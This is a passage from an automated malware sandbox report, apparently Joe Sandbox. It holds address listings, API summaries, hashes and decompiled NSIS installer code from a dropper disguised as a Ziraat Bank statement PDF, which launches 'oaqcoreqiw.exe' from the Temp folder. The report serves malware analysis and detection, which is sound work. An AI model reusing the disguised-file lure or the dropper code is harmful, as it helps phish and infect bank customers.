                                                  0x004040d7
                                                  0x0040423e
                                                  0x00404242
                                                  0x00404246
                                                  0x00404248
                                                  0x0040424d
                                                  0x00404258
                                                  0x00404263
                                                  0x00404268
                                                  0x0040426a
                                                  0x0040426c
                                                  0x0040426f
                                                  0x00404274
                                                  0x00404282
                                                  0x0040428f
                                                  0x00404296
                                                  0x00404296
                                                  0x00404297
                                                  0x00404297
                                                  0x0040429c
                                                  0x004042a2
                                                  0x004042a9
                                                  0x004042af
                                                  0x004042b1
                                                  0x004042f1
                                                  0x004042f6
                                                  0x004042fb
                                                  0x004042fb
                                                  0x00404300
                                                  0x00404309
                                                  0x0040430b
                                                  0x00404310
                                                  0x00404316
                                                  0x0040431a
                                                  0x0040431a
                                                  0x0040431f
                                                  0x00404325
                                                  0x00000000
                                                  0x00000000
                                                  0x00404330
                                                  0x00404336
                                                  0x00000000
                                                  0x00000000
                                                  0x0040433f
                                                  0x00404347
                                                  0x0040434c
                                                  0x0040434f
                                                  0x00404355
                                                  0x0040435a
                                                  0x0040435d
                                                  0x00404363
                                                  0x00404368
                                                  0x0040436b
                                                  0x00404371
                                                  0x00404379
                                                  0x0040437f
                                                  0x00404385
                                                  0x00404389
                                                  0x00404390
                                                  0x00404390
                                                  0x00404390
                                                  0x0040439a
                                                  0x004043ac
                                                  0x004043b8
                                                  0x004043bd
                                                  0x004043c7
                                                  0x004043cd
                                                  0x004043cf
                                                  0x004043d4
                                                  0x004043d1
                                                  0x004043d1
                                                  0x004043d1
                                                  0x004043e4
                                                  0x004043fc
                                                  0x004043fe
                                                  0x00404404
                                                  0x00404419
                                                  0x00404406
                                                  0x0040440f
                                                  0x00404411
                                                  0x00404411
                                                  0x0040441f
                                                  0x00404430
                                                  0x00404446
                                                  0x0040444d
                                                  0x00404453
                                                  0x00404457
                                                  0x0040445c
                                                  0x0040445e
                                                  0x00000000
                                                  0x00404464
                                                  0x00404464
                                                  0x00404466
                                                  0x00000000
                                                  0x00000000
                                                  0x0040446c
                                                  0x00404470
                                                  0x00404495
                                                  0x0040449b
                                                  0x004044a1
                                                  0x004044a3
                                                  0x00000000
                                                  0x00000000
                                                  0x004044c9
                                                  0x004044cf
                                                  0x004044d1
                                                  0x004044d6
                                                  0x00000000
                                                  0x00000000
                                                  0x004044dc
                                                  0x004044df
                                                  0x004044e2
                                                  0x004044f9
                                                  0x00404505
                                                  0x0040451e
                                                  0x00404524
                                                  0x00404528
                                                  0x0040452d
                                                  0x00404533
                                                  0x00000000
                                                  0x00000000
                                                  0x0040453d
                                                  0x00404548
                                                  0x00000000
                                                  0x00404548
                                                  0x00404472
                                                  0x00404478
                                                  0x00000000
                                                  0x00000000
                                                  0x0040447e
                                                  0x00404484
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040448a
                                                  0x0040445e
                                                  0x00404555
                                                  0x00404561
                                                  0x00404568
                                                  0x00000000
                                                  0x004042b3
                                                  0x004042b3
                                                  0x004042b6
                                                  0x004042e9
                                                  0x004042e9
                                                  0x004042eb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004042eb
                                                  0x004042b8
                                                  0x004042bc
                                                  0x004042c1
                                                  0x004042c3
                                                  0x00000000
                                                  0x00000000
                                                  0x004042d3
                                                  0x004042db
                                                  0x00000000
                                                  0x004042e1
                                                  0x004040e9
                                                  0x004040e9
                                                  0x004040ed
                                                  0x004040f2
                                                  0x00404101
                                                  0x00404101
                                                  0x00404107
                                                  0x0040410e
                                                  0x00404152
                                                  0x00404158
                                                  0x00404171
                                                  0x00404174
                                                  0x00404187
                                                  0x0040418d
                                                  0x00000000
                                                  0x00000000
                                                  0x00404193
                                                  0x0040419e
                                                  0x004041a0
                                                  0x004041a2
                                                  0x004041c1
                                                  0x004041c1
                                                  0x004041c4
                                                  0x004041c9
                                                  0x004041cc
                                                  0x004041dc
                                                  0x004041dd
                                                  0x004041df
                                                  0x00404215
                                                  0x00404225
                                                  0x00000000
                                                  0x00404225
                                                  0x004041e1
                                                  0x004041e7
                                                  0x00404200
                                                  0x00404205
                                                  0x00404207
                                                  0x00000000
                                                  0x00000000
                                                  0x00404209
                                                  0x004041f5
                                                  0x004041f5
                                                  0x004041f7
                                                  0x004041f7
                                                  0x00000000
                                                  0x004041f7
                                                  0x004041ea
                                                  0x004041ef
                                                  0x00000000
                                                  0x004041ef
                                                  0x004041ce
                                                  0x004041d4
                                                  0x00000000
                                                  0x00000000
                                                  0x004041d6
                                                  0x00000000
                                                  0x004041d6
                                                  0x004041c6
                                                  0x00000000
                                                  0x004041c6
                                                  0x004041ac
                                                  0x004041b3
                                                  0x004041b9
                                                  0x004041bb
                                                  0x00404591
                                                  0x00000000
                                                  0x00404591
                                                  0x00000000
                                                  0x004041bb
                                                  0x00404179
                                                  0x00000000
                                                  0x00404181
                                                  0x00404160
                                                  0x00404166
                                                  0x0040456e
                                                  0x0040456e
                                                  0x00404574
                                                  0x00404581
                                                  0x00404587
                                                  0x00404587
                                                  0x00000000
                                                  0x00404110
                                                  0x00404115
                                                  0x00404121
                                                  0x0040412a
                                                  0x0040422b
                                                  0x00000000
                                                  0x00404149
                                                  0x0040414c
                                                  0x00000000
                                                  0x0040414c
                                                  0x0040412a
                                                  0x0040410e

                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                  • ShowWindow.USER32(?), ref: 00404121
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                  • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                  • DestroyWindow.USER32 ref: 00404160
                                                  • SetWindowLongW.USER32 ref: 00404179
                                                  • GetDlgItem.USER32 ref: 00404198
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                  • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                  • GetDlgItem.USER32 ref: 0040425E
                                                  • GetDlgItem.USER32 ref: 00404268
                                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                  • GetDlgItem.USER32 ref: 00404379
                                                  • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                  • EnableWindow.USER32(?,?), ref: 004043AC
                                                  • EnableWindow.USER32(?,?), ref: 004043C7
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                  • EnableMenuItem.USER32 ref: 004043E4
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                  • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                  • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: H7B
                                                  • API String ID: 2475350683-2300413410
                                                  • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                  • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                  • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                  • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 260 403d9d-403dc6 call 403fed call 40603f 251->260 256 403d92-403d98 lstrcatW 252->256 257 403d7c-403d8d call 406536 252->257 256->260 257->256 266 403e58-403e60 call 40603f 260->266 267 403dcc-403dd1 260->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 268 403dd7-403dff call 406536 267->268 268->266 277 403e01-403e05 268->277 273->274 275 403f14-403f1c call 40140b 274->275 276 403e95-403ec5 RegisterClassW 274->276 290 403f26-403f31 call 403fed 275->290 291 403f1e-403f21 275->291 279 403fe3 276->279 280 403ecb-403f0f SystemParametersInfoW CreateWindowExW 276->280 282 403e17-403e23 lstrlenW 277->282 283 403e07-403e14 call 405f64 277->283 288 403fe5-403fec 279->288 280->275 284 403e25-403e33 lstrcmpiW 282->284 285 403e4b-403e53 call 405f37 call 406668 282->285 283->282 284->285 289 403e35-403e3f GetFileAttributesW 284->289 285->266 294 403e41-403e43 289->294 295 403e45-403e46 call 405f83 289->295 301 403f37-403f51 ShowWindow call 4069c5 290->301 302 403fba-403fc2 call 40579d 290->302 291->288 294->285 294->295 295->285 309 403f53-403f58 call 4069c5 301->309 310 403f5d-403f6f GetClassInfoW 301->310 307 403fc4-403fca 302->307 308 403fdc-403fde call 40140b 302->308 307->291 311 403fd0-403fd7 call 40140b 307->311 308->279 309->310 314 403f71-403f81 GetClassInfoW RegisterClassW 310->314 315 403f87-403faa DialogBoxParamW call 40140b 310->315 311->291 314->315 318 403faf-403fb8 call 403c67 315->318 318->288
                                                  C-Code - Quality: 96%
                                                  			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                  0x00403d1d
                                                  0x00403d26
                                                  0x00403d2d
                                                  0x00403d2f
                                                  0x00403d43
                                                  0x00403d55
                                                  0x00403d5e
                                                  0x00403d67
                                                  0x00403d6e
                                                  0x00403d73
                                                  0x00403d7a
                                                  0x00403d8d
                                                  0x00403d8d
                                                  0x00403d98
                                                  0x00403d31
                                                  0x00403d3c
                                                  0x00403d3c
                                                  0x00403d9d
                                                  0x00403da7
                                                  0x00403db0
                                                  0x00403db5
                                                  0x00403dc6
                                                  0x00403e58
                                                  0x00403e60
                                                  0x00403e69
                                                  0x00403e69
                                                  0x00403e7f
                                                  0x00403e85
                                                  0x00403e93
                                                  0x00403f14
                                                  0x00403f1c
                                                  0x00403f26
                                                  0x00403f2b
                                                  0x00403f31
                                                  0x00403fbb
                                                  0x00403fc0
                                                  0x00403fc2
                                                  0x00403fde
                                                  0x00000000
                                                  0x00403fde
                                                  0x00403fc4
                                                  0x00403fca
                                                  0x00403fd2
                                                  0x00403fd2
                                                  0x00000000
                                                  0x00403fca
                                                  0x00403f3f
                                                  0x00403f4a
                                                  0x00403f4f
                                                  0x00403f51
                                                  0x00403f58
                                                  0x00403f58
                                                  0x00403f63
                                                  0x00403f6b
                                                  0x00403f6d
                                                  0x00403f6f
                                                  0x00403f78
                                                  0x00403f7b
                                                  0x00403f81
                                                  0x00403f81
                                                  0x00403fa0
                                                  0x00403fb1
                                                  0x00000000
                                                  0x00403fb6
                                                  0x00403f1e
                                                  0x00403f20
                                                  0x00000000
                                                  0x00403e95
                                                  0x00403e95
                                                  0x00403ea1
                                                  0x00403eab
                                                  0x00403eb1
                                                  0x00403eb6
                                                  0x00403ec5
                                                  0x00403fe3
                                                  0x00403fe3
                                                  0x00000000
                                                  0x00403fe3
                                                  0x00403ed4
                                                  0x00403f0f
                                                  0x00000000
                                                  0x00403f0f
                                                  0x00403dcc
                                                  0x00403dcc
                                                  0x00403dcf
                                                  0x00403dd1
                                                  0x00000000
                                                  0x00000000
                                                  0x00403ddf
                                                  0x00403df1
                                                  0x00403df6
                                                  0x00403dff
                                                  0x00000000
                                                  0x00000000
                                                  0x00403e05
                                                  0x00403e07
                                                  0x00403e14
                                                  0x00403e14
                                                  0x00403e1d
                                                  0x00403e23
                                                  0x00403e4b
                                                  0x00403e53
                                                  0x00000000
                                                  0x00403e35
                                                  0x00403e36
                                                  0x00403e3f
                                                  0x00403e45
                                                  0x00403e46
                                                  0x00000000
                                                  0x00403e46
                                                  0x00403e41
                                                  0x00403e43
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403e43
                                                  0x00403e23

                                                  APIs
                                                    • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                    • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                  • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                  • lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,?,?,?,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,772EFAA0), ref: 00403E18
                                                  • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,?,?,?,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                  • GetFileAttributesW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,?,00000000,?), ref: 00403E36
                                                  • LoadImageW.USER32 ref: 00403E7F
                                                    • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                  • RegisterClassW.USER32 ref: 00403EBC
                                                  • SystemParametersInfoW.USER32 ref: 00403ED4
                                                  • CreateWindowExW.USER32 ref: 00403F09
                                                  • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                  • GetClassInfoW.USER32 ref: 00403F6B
                                                  • GetClassInfoW.USER32 ref: 00403F78
                                                  • RegisterClassW.USER32 ref: 00403F81
                                                  • DialogBoxParamW.USER32 ref: 00403FA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-3834852686
                                                  • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                  • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                  • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                  • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 342 403322-403327 334->342 343 403257-40325a 334->343 337 403163-40317a 335->337 338 40317c 337->338 339 40317e-403187 call 4035e2 337->339 338->339 348 40318d-403194 339->348 349 4032de-4032e6 call 40302e 339->349 342->327 345 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 343->345 346 40325c-403274 call 4035f8 call 4035e2 343->346 373 4032d4-4032d9 345->373 374 4032e8-403318 call 4035f8 call 403371 345->374 346->342 368 40327a-403280 346->368 352 403210-403214 348->352 353 403196-4031aa call 406113 348->353 349->342 357 403216-40321d call 40302e 352->357 358 40321e-403224 352->358 353->358 371 4031ac-4031b3 353->371 357->358 364 403233-40323b 358->364 365 403226-403230 call 406b22 358->365 364->337 372 403241 364->372 365->364 368->342 368->345 371->358 376 4031b5-4031bc 371->376 372->334 373->327 382 40331d-403320 374->382 376->358 379 4031be-4031c5 376->379 379->358 381 4031c7-4031ce 379->381 381->358 383 4031d0-4031f0 381->383 382->342 384 403329-40333a 382->384 383->342 385 4031f6-4031fa 383->385 386 403342-403347 384->386 387 40333c 384->387 388 403202-40320a 385->388 389 4031fc-403200 385->389 391 403348-40334e 386->391 387->386 388->358 390 40320c-40320e 388->390 389->372 389->388 390->358 391->391 392 403350-403368 call 406113 391->392 392->327
                                                  C-Code - Quality: 98%
                                                  			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\frontdesk\\Desktop", L"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\frontdesk\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                                                  0x004030db
                                                  0x004030de
                                                  0x004030e1
                                                  0x004030fb
                                                  0x00403100
                                                  0x00403113
                                                  0x00403118
                                                  0x0040311e
                                                  0x00000000
                                                  0x00403120
                                                  0x00403131
                                                  0x00403142
                                                  0x00403149
                                                  0x00403151
                                                  0x00403156
                                                  0x00403158
                                                  0x00403243
                                                  0x00403245
                                                  0x00403251
                                                  0x00000000
                                                  0x00000000
                                                  0x0040325a
                                                  0x00403286
                                                  0x0040328b
                                                  0x00403296
                                                  0x00403298
                                                  0x004032a9
                                                  0x004032c4
                                                  0x004032cd
                                                  0x004032d2
                                                  0x004032f1
                                                  0x00403301
                                                  0x00403313
                                                  0x00403318
                                                  0x00403320
                                                  0x0040332d
                                                  0x00403335
                                                  0x0040333a
                                                  0x0040333c
                                                  0x0040333c
                                                  0x00403344
                                                  0x00403344
                                                  0x00403347
                                                  0x00403348
                                                  0x00403348
                                                  0x0040334b
                                                  0x0040334d
                                                  0x0040334d
                                                  0x00403357
                                                  0x00403363
                                                  0x00000000
                                                  0x00403368
                                                  0x00000000
                                                  0x00403320
                                                  0x00000000
                                                  0x004032d4
                                                  0x00403262
                                                  0x00403274
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040315e
                                                  0x00403163
                                                  0x00403168
                                                  0x0040316c
                                                  0x00403173
                                                  0x0040317a
                                                  0x0040317c
                                                  0x0040317c
                                                  0x00403187
                                                  0x004032e0
                                                  0x00403322
                                                  0x00000000
                                                  0x00403322
                                                  0x00403194
                                                  0x00403214
                                                  0x00403218
                                                  0x0040321d
                                                  0x00000000
                                                  0x00403214
                                                  0x0040319d
                                                  0x004031a2
                                                  0x004031aa
                                                  0x004031d0
